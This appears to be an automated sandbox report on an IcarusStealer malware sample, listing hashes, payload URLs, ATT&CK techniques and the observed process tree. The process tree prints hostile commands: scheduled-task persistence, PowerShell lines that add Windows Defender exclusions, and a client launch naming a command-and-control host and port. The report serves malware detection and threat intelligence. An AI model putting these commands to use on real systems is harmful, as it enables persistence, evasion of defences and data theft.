icarusstealer | 13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882

Analysis

max time kernel
16s
max time network
64s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
09/03/2024, 09:41

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

custom1.exe
Size

24.9MB
MD5

4e1c29f0c1af62ddea916c6b80548c76
SHA1

38d9f15356b6a65f4e76ee739867d55b01493793
SHA256

13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882
SHA512

f863e54437a36b53f91057f74bdbfcaed90c93256333afe978be5f7b73b417a74084d3a92afe4b6ceea96fd909997cf22b30612c43d6d0d27c64c0bba7db9c28
SSDEEP

49152:lfRW10dDWeHzJhNF/CBpOqqUe00zCMe8KfFo:lfw1yaeHLNF/22UwCL8yF

Score

10^/10

icarusstealer persistence stealer

Malware Config

Extracted

Family

icarusstealer

Attributes

payload_url
https://blackhatsec.org/add.jpg

https://blackhatsec.org/remove.jpg

Signatures

IcarusStealer
Icarus is a modular stealer written in C# First adverts in July 2022.
stealer icarusstealer

Modifies Installed Components in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	switched.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	tesetey.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	custom1.exe

Executes dropped EXE 4 IoCs

pid	Process
112	Client.exe
1388	switched.exe
4888	pulse x loader.exe
1840	tesetey.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
48	raw.githubusercontent.com
49	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
54	ipinfo.io

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1840 set thread context of 2596	1840	tesetey.exe	113

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
5820	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
5204	timeout.exe

Modifies registry class 6 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{27B3FDD4-55CD-4F09-B05D-D07610C2AB8E}	explorer.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1840	tesetey.exe
1840	tesetey.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4888	pulse x loader.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

description	pid	Process
Token: SeDebugPrivilege	1840	tesetey.exe
Token: SeShutdownPrivilege	2324	explorer.exe
Token: SeCreatePagefilePrivilege	2324	explorer.exe
Token: SeShutdownPrivilege	2324	explorer.exe
Token: SeCreatePagefilePrivilege	2324	explorer.exe
Token: SeDebugPrivilege	2596	cvtres.exe
Token: SeShutdownPrivilege	2324	explorer.exe
Token: SeCreatePagefilePrivilege	2324	explorer.exe
Token: SeShutdownPrivilege	2324	explorer.exe
Token: SeCreatePagefilePrivilege	2324	explorer.exe
Token: SeShutdownPrivilege	2324	explorer.exe
Token: SeCreatePagefilePrivilege	2324	explorer.exe

Suspicious use of FindShellTrayWindow 6 IoCs

pid	Process
2324	explorer.exe
2324	explorer.exe
2324	explorer.exe
2324	explorer.exe
2324	explorer.exe
2324	explorer.exe

Suspicious use of SendNotifyMessage 8 IoCs

pid	Process
2324	explorer.exe
2324	explorer.exe
2324	explorer.exe
2324	explorer.exe
2324	explorer.exe
2324	explorer.exe
2324	explorer.exe
2324	explorer.exe

Suspicious use of WriteProcessMemory 35 IoCs

description	pid	Process	procid_target
PID 4604 wrote to memory of 112	4604	custom1.exe	98
PID 4604 wrote to memory of 112	4604	custom1.exe	98
PID 4604 wrote to memory of 112	4604	custom1.exe	98
PID 4604 wrote to memory of 1388	4604	custom1.exe	100
PID 4604 wrote to memory of 1388	4604	custom1.exe	100
PID 4604 wrote to memory of 1388	4604	custom1.exe	100
PID 1388 wrote to memory of 4888	1388	switched.exe	101
PID 1388 wrote to memory of 4888	1388	switched.exe	101
PID 4888 wrote to memory of 4184	4888	pulse x loader.exe	115
PID 4888 wrote to memory of 4184	4888	pulse x loader.exe	115
PID 1388 wrote to memory of 1840	1388	switched.exe	103
PID 1388 wrote to memory of 1840	1388	switched.exe	103
PID 1388 wrote to memory of 1840	1388	switched.exe	103
PID 4184 wrote to memory of 4800	4184	cmd.exe	106
PID 4184 wrote to memory of 4800	4184	cmd.exe	106
PID 4184 wrote to memory of 4368	4184	cmd.exe	107
PID 4184 wrote to memory of 4368	4184	cmd.exe	107
PID 4184 wrote to memory of 3312	4184	cmd.exe	108
PID 4184 wrote to memory of 3312	4184	cmd.exe	108
PID 1840 wrote to memory of 1488	1840	tesetey.exe	110
PID 1840 wrote to memory of 1488	1840	tesetey.exe	110
PID 1840 wrote to memory of 1488	1840	tesetey.exe	110
PID 1840 wrote to memory of 2324	1840	tesetey.exe	112
PID 1840 wrote to memory of 2324	1840	tesetey.exe	112
PID 1840 wrote to memory of 2596	1840	tesetey.exe	113
PID 1840 wrote to memory of 2596	1840	tesetey.exe	113
PID 1840 wrote to memory of 2596	1840	tesetey.exe	113
PID 1840 wrote to memory of 2596	1840	tesetey.exe	113
PID 1840 wrote to memory of 2596	1840	tesetey.exe	113
PID 1840 wrote to memory of 2596	1840	tesetey.exe	113
PID 1840 wrote to memory of 2596	1840	tesetey.exe	113
PID 1840 wrote to memory of 2596	1840	tesetey.exe	113
PID 1840 wrote to memory of 4928	1840	tesetey.exe	114
PID 1840 wrote to memory of 4928	1840	tesetey.exe	114
PID 1840 wrote to memory of 4928	1840	tesetey.exe	114

C:\Users\Admin\AppData\Local\Temp\custom1.exe
"C:\Users\Admin\AppData\Local\Temp\custom1.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4604
- C:\Users\Admin\AppData\Local\Temp\Client.exe
  "C:\Users\Admin\AppData\Local\Temp\Client.exe"
  2⤵
  - Executes dropped EXE
  PID:112
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit
    3⤵
    PID:5336
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'
      4⤵
      Creates scheduled task(s)
      PID:5820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4561.tmp.bat""
    3⤵
    PID:5392
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:5204
  - - C:\Windows\System32\CatRoot\$SXR\$SXR.exe
      "C:\Windows\System32\CatRoot\$SXR\$SXR.exe"
      4⤵
      PID:2120
- C:\Users\Admin\AppData\Local\Temp\switched.exe
  "C:\Users\Admin\AppData\Local\Temp\switched.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1388
- - C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
    "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of WriteProcessMemory
    PID:4888
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4184
    - - C:\Windows\system32\certutil.exe
        
        certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
        5⤵
        
        PID:4800
    - - C:\Windows\system32\find.exe
        
        find /i /v "md5"
        5⤵
        
        PID:4368
    - - C:\Windows\system32\find.exe
        
        find /i /v "certutil"
        5⤵
        
        PID:3312
- - C:\Users\Admin\AppData\Local\Temp\tesetey.exe
    "C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1840
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ffxuozsf\ffxuozsf.cmdline"
      4⤵
      PID:1488
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES838.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC54962C1D5784C8DA6A081BE9CE49B4C.TMP"
        5⤵
        
        PID:3672
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      Modifies Installed Components in the registry
      Modifies registry class
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:2324
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2596
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
        5⤵
        
        PID:4504
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        6⤵
        
        PID:548
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
        5⤵
        
        PID:4176
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
        6⤵
        
        PID:1596
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe & exit
      4⤵
      PID:4928
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4184
    - - C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe
        
        C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe
        5⤵
        
        PID:2788

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:2180

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:5352

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa39b2855 /state1:0x41c64e6d
1⤵
PID:3936

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:4340

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
384KB

MD5
558457f9547cbbb39d34c04653cb36a5

SHA1
5cfb94b139e3e87adbd8e77f4d434e07ab5ba90d

SHA256
d7d07a880eb28ff36e3b25e92ae0155b25403c8a50df1ec49f127249008ba13a

SHA512
01fde93ca3faba9c8c54c125886c82c04244f18a259509e4afeb41f77a6c9003e5ad658786d362ea1e1380e068b97360dbc6a9c65a26a4503283a8ad23cdab65

Download Submit
C:\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
10.2MB

MD5
a4a31e7c630a3e4d6051ea116269a48b

SHA1
2c95c0ab5bf63583606b970d24802d0ee3b6b3d0

SHA256
924c1c072b76efdf126c5b586004709ada59d95464d4015f9bc7f072f17c3071

SHA512
dd6d6ae8817d19e27a71bc8f05197fc7baf7e8c31b34edd5fc6ad63a45e579b922b84a9ef58ee60377668b760b15fcabc704331e2c68c52b4330c3248eac7cb0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
2.0MB

MD5
fb2217b982a51ca9dfbcc4d9e79ad147

SHA1
746f784d16f2e57aa03310c1ece1b7ce1d28497d

SHA256
507cb4c8600f18c4710be2752bcd3f428bd9199569cac8e28db006ce7a463929

SHA512
9fe5f797597eccc34449687d8f0b7c6e9622f10cc8ece218fb8e810a60f93b157aa07fd3d6382349a0cf1ff60d5f51f4058bad472e3bdf197d809a321fdc401b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f43gn3rq.2gw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

Filesize
832KB

MD5
5ffb2b14e4a70eee3dcef427e296b5e7

SHA1
e2bbad28f116d3ef1898fdd74dc0a9aadf644fa8

SHA256
d9ef2803f96930eda032541a145e8d66d447210920b239bed84424142794a0cf

SHA512
26e3e297163e5eb7ffc6e2467998f517e033b5e7bff4c446c158b6c6ad201daec79000991f6d59a3ca7b082d200663a1f1ba787978d55188c2940af27bf675b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

Filesize
704KB

MD5
6e341cabcf34957160978a08a77a1271

SHA1
8c6465abf03f43d8984163a5973f12d28293436a

SHA256
717532ad4f42381a497df422d7a0d69700dd656e3dd5846e630e66bcfdc66a20

SHA512
1692ee455e83c8b9629fc2414f20537df7393a6e98a726e4bbf56ec65d64fa766015e121f5c72506039e2bfbe4a1ae17bbda61c0f81af5a64fd7c6966e159343

Download Submit
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

Filesize
576KB

MD5
6239d11b49526790f4c67e7d269fba3c

SHA1
6f8fad15f6525e354e53a8ac3f32816162992f1f

SHA256
b18ca03fa4584b2c8b802dda4cad6445c855b91ff1d881531fbb36b32a9ca235

SHA512
794209ba6ef2537fea4d4d253f5d430088abe75624168827a9b973732f959d50e149ad6def1ef42b231be498f5587c1282eab7ca9319e0c61868d91f4e88e3fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\switched.exe

Filesize
640KB

MD5
9ac5e5e6a3e7594fd49de7837f2cd3ea

SHA1
c1105cc8bffb3a51d729b5116ae43c2e1eb81fd1

SHA256
0c9d3c2ac2a90331f7e2b8c679efea78841dd33292c23591f21d6a88d6884d75

SHA512
bc67e311ba9279d37c0883227f150799c15c27f32a3406a1d026df1b44300ff38e1e8a0ea77869a057e0bf0c40e8a54141c98444fbdb42406d19b967a845c901

Download Submit
C:\Users\Admin\AppData\Local\Temp\switched.exe

Filesize
128KB

MD5
ffc387c92017014fb8659c7329d94367

SHA1
e5372ac69aba48d61ca0986f06572bfdfa4362a7

SHA256
24150bb03de895a8729a38e15d992b4d0c78044aa958fb252419794d0da02785

SHA512
f0713132cf495b30c7a4aac048457ccd830899c0b25a656b41c8775c0f979a098f3426e80527fe6b8534649747233751c1cb83274d8b13b7836b92040bb1b117

Download Submit
C:\Users\Admin\AppData\Local\Temp\switched.exe

Filesize
64KB

MD5
34aba8b9c6bf59cb64210dea260c965d

SHA1
48bf9ede9e5ec9d8d5d3a7662158305ee9b50939

SHA256
3b5c53495c4a38a0fdc67e57eac00c914f4f2b4ee42b76932557012eab43c378

SHA512
39d1051ced8cfddfdc661362bbc5d3cf3c971304c7c8c668aeb944932a93f541d61e888c518673e36414cde004d9b9a09e007a25d3f994cc65edef0d7dc907cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\tesetey.exe

Filesize
494KB

MD5
0f0838bc6642dd6bc603368e50b4aba3

SHA1
932bd4d1c11996bf8ac3ac74a94b266e96d44c36

SHA256
4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9

SHA512
a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860

Download Submit
C:\Users\Admin\AppData\Local\Temp\tesetey.exe

Filesize
448KB

MD5
d00fe7ae5bb20dfb9cf36f395415864e

SHA1
6c792a4722d8f4a3d751a5ec2abd83671439bb0c

SHA256
dd56f06f520b6c3d99ca01fa8213684583bba2a8efc4c0b2eb625b7ab94452b0

SHA512
da2b05edefb42f27bb5d881c8928dc0a1de84b617a7cb609fa2d8c33963c3cda661fc432f523a1e23b28fc4a959776eeac05a1ab638aa1a4fab5653344a9f511

Download Submit
C:\Users\Admin\AppData\Local\Temp\tesetey.exe

Filesize
14KB

MD5
9df421ba2a2bc886f33b7cc73d3e23f1

SHA1
2dbfaac2e682aae21d01424e1b37da4f37fb4ed4

SHA256
6d3b1bace350a441c3163295bb3fc227bbe01ce5cf0646edc878d68b0174c002

SHA512
4d3309ec76c69185dcd7d749194bfe1e8656981e3fcea8f1293c8fcfd3a6ceb57ac2232a1c674854ff893ec2dd095eb0830ee738620c3d00bc2fa9e22e50b8c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp4561.tmp.bat

Filesize
150B

MD5
25beaf1b8ff84f702e75236f1c888c0f

SHA1
f3782bbe34fa5a88a0d275cd5c0e2dc0677890c1

SHA256
af6367be2bbb88651f3e2932f9665ef3d099975a7912203e115358693d828907

SHA512
b8437b22d91c1ccb5c7b4b05dde67fa2a46a411e338ba718793691bcd4ae1f2b38ac23ed2855f340a5129386b779eb4404bcd3b9700b3028d4821a24625e5f28

Download Submit
C:\Windows\System32\CatRoot\$SXR\$SXR.exe

Filesize
4.6MB

MD5
f52e9c25194408e3207b0aad1af6c3ce

SHA1
9582dadacb78f4c2ab8ef14ee306d449a02db082

SHA256
0af144d8915477e70fb1b1d159456cd22383a3da1bb522fd7eb8e6035359aeee

SHA512
40d0c4eb85f3364ea3de9f2850790ca2cc39e8b8ddc641cedf9cfb9da6b88acdeb3f7cfbc3f0e714ab5a1fe54cf57ecb7d411f363cba1e918b3f5fdda65c0d10

Download Submit
C:\Windows\System32\CatRoot\$SXR\$SXR.exe

Filesize
4.2MB

MD5
599a5b3c66a0c41d2c3cb1ffe2704fd8

SHA1
df4eeeb35420f78442d014eca4d677217f2accd2

SHA256
039040204692d2b45e80dcb537444906bef18fc03fdc2155de3eb500b86f604f

SHA512
fb8f0a136b0ec2b5bfe71103dbda6a73285a9793472a69fae717d63a0084e3c2b69980e32dfa9b22c850c554fe3e77b0599b0d3b614da89a8d936a11ca05fd52

Download Submit
memory/112-67-0x0000000005F60000-0x0000000005F82000-memory.dmp

Filesize
136KB

Download
memory/112-21-0x0000000073500000-0x0000000073CB0000-memory.dmp

Filesize
7.7MB

Download
memory/112-106-0x0000000073500000-0x0000000073CB0000-memory.dmp

Filesize
7.7MB

Download
memory/112-20-0x0000000000CD0000-0x0000000001310000-memory.dmp

Filesize
6.2MB

Download
memory/112-76-0x0000000073500000-0x0000000073CB0000-memory.dmp

Filesize
7.7MB

Download
memory/112-50-0x0000000005D20000-0x0000000005D30000-memory.dmp

Filesize
64KB

Download
memory/112-68-0x0000000006000000-0x0000000006066000-memory.dmp

Filesize
408KB

Download
memory/548-135-0x000000007F720000-0x000000007F730000-memory.dmp

Filesize
64KB

Download
memory/548-73-0x0000000005B10000-0x0000000006138000-memory.dmp

Filesize
6.2MB

Download
memory/548-136-0x000000006F6C0000-0x000000006F70C000-memory.dmp

Filesize
304KB

Download
memory/548-159-0x0000000073500000-0x0000000073CB0000-memory.dmp

Filesize
7.7MB

Download
memory/548-105-0x0000000006E20000-0x0000000006E6C000-memory.dmp

Filesize
304KB

Download
memory/548-78-0x0000000006290000-0x00000000062F6000-memory.dmp

Filesize
408KB

Download
memory/548-129-0x0000000003490000-0x00000000034A0000-memory.dmp

Filesize
64KB

Download
memory/548-74-0x0000000073500000-0x0000000073CB0000-memory.dmp

Filesize
7.7MB

Download
memory/548-72-0x0000000003490000-0x00000000034A0000-memory.dmp

Filesize
64KB

Download
memory/1596-70-0x0000000002C60000-0x0000000002C70000-memory.dmp

Filesize
64KB

Download
memory/1596-156-0x0000000006FF0000-0x0000000007093000-memory.dmp

Filesize
652KB

Download
memory/1596-134-0x000000006F6C0000-0x000000006F70C000-memory.dmp

Filesize
304KB

Download
memory/1596-69-0x0000000073500000-0x0000000073CB0000-memory.dmp

Filesize
7.7MB

Download
memory/1596-75-0x0000000002C60000-0x0000000002C70000-memory.dmp

Filesize
64KB

Download
memory/1596-155-0x0000000006570000-0x000000000658E000-memory.dmp

Filesize
120KB

Download
memory/1596-77-0x0000000005240000-0x0000000005262000-memory.dmp

Filesize
136KB

Download
memory/1596-71-0x0000000000E50000-0x0000000000E86000-memory.dmp

Filesize
216KB

Download
memory/1596-132-0x000000007F850000-0x000000007F860000-memory.dmp

Filesize
64KB

Download
memory/1596-98-0x0000000005A50000-0x0000000005DA4000-memory.dmp

Filesize
3.3MB

Download
memory/1596-102-0x0000000005FC0000-0x0000000005FDE000-memory.dmp

Filesize
120KB

Download
memory/1596-131-0x0000000002C60000-0x0000000002C70000-memory.dmp

Filesize
64KB

Download
memory/1596-157-0x0000000073500000-0x0000000073CB0000-memory.dmp

Filesize
7.7MB

Download
memory/1596-133-0x00000000065E0000-0x0000000006612000-memory.dmp

Filesize
200KB

Download
memory/1840-43-0x0000000004AE0000-0x0000000004B7C000-memory.dmp

Filesize
624KB

Download
memory/1840-46-0x0000000006780000-0x0000000006D24000-memory.dmp

Filesize
5.6MB

Download
memory/1840-41-0x00000000001D0000-0x0000000000252000-memory.dmp

Filesize
520KB

Download
memory/1840-42-0x0000000073500000-0x0000000073CB0000-memory.dmp

Filesize
7.7MB

Download
memory/1840-44-0x0000000004B80000-0x0000000004C12000-memory.dmp

Filesize
584KB

Download
memory/1840-45-0x0000000004DB0000-0x0000000004DC0000-memory.dmp

Filesize
64KB

Download
memory/1840-62-0x0000000073500000-0x0000000073CB0000-memory.dmp

Filesize
7.7MB

Download
memory/2324-112-0x00000000031D0000-0x00000000031D1000-memory.dmp

Filesize
4KB

Download
memory/2596-163-0x0000000073500000-0x0000000073CB0000-memory.dmp

Filesize
7.7MB

Download
memory/2596-60-0x0000000004FA0000-0x0000000004FB0000-memory.dmp

Filesize
64KB

Download
memory/2596-59-0x0000000073500000-0x0000000073CB0000-memory.dmp

Filesize
7.7MB

Download
memory/2596-58-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2788-66-0x00007FFEAA240000-0x00007FFEAAD01000-memory.dmp

Filesize
10.8MB

Download
memory/2788-63-0x0000000000360000-0x0000000000368000-memory.dmp

Filesize
32KB

Download
memory/2788-164-0x00007FFEAA240000-0x00007FFEAAD01000-memory.dmp

Filesize
10.8MB

Download
memory/4888-130-0x00007FF697560000-0x00007FF69799C000-memory.dmp

Filesize
4.2MB

Download
memory/4888-158-0x00007FF697560000-0x00007FF69799C000-memory.dmp

Filesize
4.2MB

Download
memory/4888-37-0x00007FF697560000-0x00007FF69799C000-memory.dmp

Filesize
4.2MB

Download
memory/5352-115-0x000001DB070C0000-0x000001DB070E0000-memory.dmp

Filesize
128KB

Download
memory/5352-121-0x000001DB07770000-0x000001DB07790000-memory.dmp

Filesize
128KB

Download
memory/5352-119-0x000001DB07600000-0x000001DB07620000-memory.dmp

Filesize
128KB

Download

Analysis

Sharing

Errors

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads